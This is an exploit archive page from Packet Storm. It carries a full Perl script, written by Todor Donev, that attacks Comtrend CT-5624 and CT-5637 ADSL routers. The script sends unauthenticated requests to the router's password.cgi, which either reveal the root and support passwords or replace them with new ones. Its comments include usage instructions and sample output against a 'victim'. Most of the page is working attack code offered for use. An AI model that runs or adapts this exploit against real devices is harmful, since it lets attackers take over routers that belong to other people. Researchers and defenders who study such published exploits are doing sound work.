exploit the possibilities

Comtrend Router CT-5624 Remote Root Password Changer/Disclosure

Comtrend Router CT-5624 Remote Root Password Changer/Disclosure
Posted Nov 8, 2011
Authored by Todor Donev

Comtrend Router CT-5624 remote root / support password disclosure and change exploit.

tags | exploit, remote, root, info disclosure
MD5 | c8181cbecebd786cc8eff75eb910b0d2

Comtrend Router CT-5624 Remote Root Password Changer/Disclosure

Change Mirror Download
#!/usr/bin/perl
#
# [+] Comtrend Router CT-5624 Remote Root/Support Password Disclosure/Change Exploit
#
# Author: Todor Donev
# Email: todor.donev@@gmail
# Type: Hardware
# Vuln Type: Remote
#
# Tested:
# Board ID : CT-5624
# Software : A011-306TSR-C01_R03
# Bootloader : 1.0.37-0.7-3
# ADSL : A2pB022c3.d20e
#
# Board ID : CT-5637
# Software : A111-312BTC-C01_R12
# Bootloader : 1.0.37-12.1-1
# ADSL : A2pB023k.d20k_rc2
#
#####
# CT-5624 ADSL2+ Ethernet Router
# The CT-5624 series ADSL2+ compact and high performance Ethernet router
# provides four 10/100 Ethernet Interfaces, and one ADSL line interface
# to access the Internet, incorporating LAN or Video on Demand over one
# ordinary telephone line, at speeds of up to 24 Mbps. It also has full
# routing capabilities to segment/route IP protocol, and supports advanced
# security functions.
#####
#
# playground$ perl comtrend.pl -c 192.168.1.1:80
# [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit
# [!] Target: 192.168.1.1:80
# [o] New root password: root31337
# [o] New support password: sup31337
# [*] Successfully !!
##
# playground$ perl comtrend.pl -d 192.168.1.1:80
# [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit
# [!] Target: 192.168.1.1:80
# [o] root: root31337
# [o] support: sup31337
##
# playground$ perl comtrend.pl
# [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit
# [!] usg: perl comtrend.pl [-c or -d] <victim>
# [!] -d: Disclosure Root/Support password
# [!] -c: Change Root/Support password
#
#####
# Thanks to Tsvetelina Emirska
# for the help and support which gives me =)
#####

use LWP::Simple;
print "[+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit\n";
if (@ARGV == 0) {&usg;}
while (@ARGV > 0) {
$type = shift(@ARGV);
$t = shift(@ARGV);
if ($type eq "-d") {
my $r = get("http://$t/password.cgi") or die("suck!");
print "[!] Target: $t\n";
if ($r =~ m/pwdAdmin = '(.*)';/g) {
$result .= "[o] root: $1\n";
}
if ($r =~ m/pwdSupport = '(.*)';/g) {
$result .= "[o] support: $1\n";
print $result;
}}}
if ($type eq "-c") {
print "[!] Target: $t\n";
print "[o] New root password: ";
my $rootpass=<STDIN>;
chomp($rootpass);
print "[o] New support password: ";
my $suppass=<STDIN>;
chomp($suppass);
my $r = get("http://$t/password.cgi?sysPassword=$rootpass&sptPassword=$suppass") or die("suck!");
if ($r =~ m/pwdAdmin = '$rootpass';/g) {
print "[*] Successfully !!\n";
}}
sub usg(){
print "[!] usg: perl comtrend.pl [-c or -d] <victim>\n";
print "[!] -d: Disclosure Root/Support password\n";
print "[!] -c: Change Root/Support password\n";
exit;
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

March 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    15 Files
  • 2
    Mar 2nd
    5 Files
  • 3
    Mar 3rd
    3 Files
  • 4
    Mar 4th
    25 Files
  • 5
    Mar 5th
    20 Files
  • 6
    Mar 6th
    16 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    12 Files
  • 9
    Mar 9th
    3 Files
  • 10
    Mar 10th
    4 Files
  • 11
    Mar 11th
    23 Files
  • 12
    Mar 12th
    12 Files
  • 13
    Mar 13th
    12 Files
  • 14
    Mar 14th
    19 Files
  • 15
    Mar 15th
    12 Files
  • 16
    Mar 16th
    3 Files
  • 17
    Mar 17th
    1 Files
  • 18
    Mar 18th
    15 Files
  • 19
    Mar 19th
    22 Files
  • 20
    Mar 20th
    14 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    17 Files
  • 23
    Mar 23rd
    1 Files
  • 24
    Mar 24th
    1 Files
  • 25
    Mar 25th
    16 Files
  • 26
    Mar 26th
    21 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close